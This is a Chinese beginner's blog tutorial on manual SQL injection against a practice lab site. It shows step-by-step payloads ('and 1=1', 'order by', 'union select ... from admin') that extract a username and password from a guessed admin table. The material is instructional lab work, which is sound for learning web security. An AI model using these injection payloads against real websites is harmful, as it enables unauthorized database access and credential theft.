这期教学是给小白学习的，大佬看看就好。

我们先打开靶场：http://rhiq8003.ia.aqlab.cn/?id=1

我们先进去发现是一个很简单的页端。

我们先判断是否有注入。

我们先在链接后面添加: and 1=1

来判断是否有注入。

发现返回正常。

我们再在链接末尾输入:and 1=2

这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。

（这里解释一下and 1=1是什么意思

其实很简单就是你问一个服务器1是不是=1

所以我们and 1=1

返回正常

and1=2就是问1是不是=2所以我们报错了）

我们还可以输入：

order by 1

和：order by 2

来进行判断。

然后我们再在链接后面添加：

union select 1 from admin

union select 1,2 from admin

union select 1,2,3 from admin

注：admin这个表是我猜出来的你们可以用工具去扫，因为我猜到账号密码会在admin里面

以此类推

我们发现

在 union select 1,2 from admin的时候

这里多了个2

咱们就把2给排除掉

把2替换成：password

password是密码的意思

注：因为我们需要在2这个表里面查找。

账号和密码的表名这个我们也得在表里面猜出来

在链接末端输入：and 1=2 union select 1,password from admin

好的我们现在发现了密码

密码为：hello hack

我们下一步开始查找账号

我们把：password替换成：username

注：这俩个一般都是默认为密码和账号的意思翻译一下就知道是什么意思了。

好的我们账号也出来了。

账号为：admin

密码为：hello hack

这是最基础的手注教程博主也是小白就让我们一起来学习进步吧！